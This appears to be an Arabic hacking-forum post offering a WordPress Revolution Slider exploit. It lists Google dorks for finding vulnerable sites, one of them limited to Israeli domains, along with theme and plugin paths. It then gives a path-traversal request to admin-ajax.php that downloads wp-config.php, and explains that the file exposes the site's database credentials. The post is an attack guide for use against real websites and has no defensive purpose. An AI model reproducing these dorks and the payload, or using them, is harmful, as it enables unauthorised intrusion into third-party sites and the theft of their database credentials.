اليوم انا معاكم بثغرة حديثة خاصة ب WordPress
نتوكل على الله
اولا الدوركات
inurl:wp-content
inurl:wp-content/themes/
inurl:wp-content inurl:revslider
inurl:wp-content in****:revslider.php
inurl:wp-content in****:revslider_front.php
inurl:wp-content in****:revslider.php site:il
themes/WP-Smartcheck
themes/stendhal
theme/templates/sliders
themes/RoyalOak
themes/celestino2
plugins/dnd-shortcodes
themes/incrediblewp
themes/celestino
plugins/meteor-extras
themes/bazar
themes/cheope
themes/aziza
الاستغلال
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
=================================
الشرح
عند الاستغلال راح يتحمل عندنا ملف اسموا admin-ajax.php
وداخل الملف رح نلاقي
بيانات قاعدة البيانات